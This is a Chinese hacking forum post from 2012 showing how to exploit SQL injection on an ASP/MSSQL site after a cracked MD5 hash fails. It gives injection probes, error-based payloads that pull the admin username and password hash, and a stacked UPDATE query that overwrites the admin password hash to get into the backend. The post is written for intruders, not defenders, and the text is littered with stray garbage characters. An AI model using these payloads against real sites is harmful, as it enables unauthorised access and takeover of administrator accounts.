经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。4 s1 ^# s! a+ ]
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
5 f3 S) `" w, N6 B# a测试如下:) S! C$ _$ L4 z( `& t5 N" ?; m
http://www.tmdsb.com/news.asp?id=121
8 k( v+ L" l8 w1 q在地址后输入单引号,显示
5 q7 H- g1 K# }7 VMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’; U" u* h9 A0 F, `5 H- z
字符串 ’’’ 之前有未闭合的引号
/ W; g' C& n+ x2 z( a. C' A- h/news/tmdws.asp,行63 q* R( W% u" y0 w! ]
说明没有过滤单引号且数据库是MSSQL.
* v6 o c2 |, s+ r6 E) Jand 1=1正常。and 1=2出错。肯定存在注入
, D/ a1 g; r0 S0 R: J: \: d接着输入 L2 Y& H! H6 Y3 k5 v: `
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)5 V2 y3 x R5 ]$ X7 w! }# l
得到帐号为:admin
8 }6 k- n# J9 e: S% P; o: O) i# @http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
/ X7 u$ j* l0 m8 J4 [) Y得到密码为:a4716077c2ba075c3 `# n8 ~$ [/ a9 y! Z& H& B
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
# |( \! L& H7 I: N. G命令如下 :
- A& e% y' j% x7 m) J;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
, A6 r- b+ }, P这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41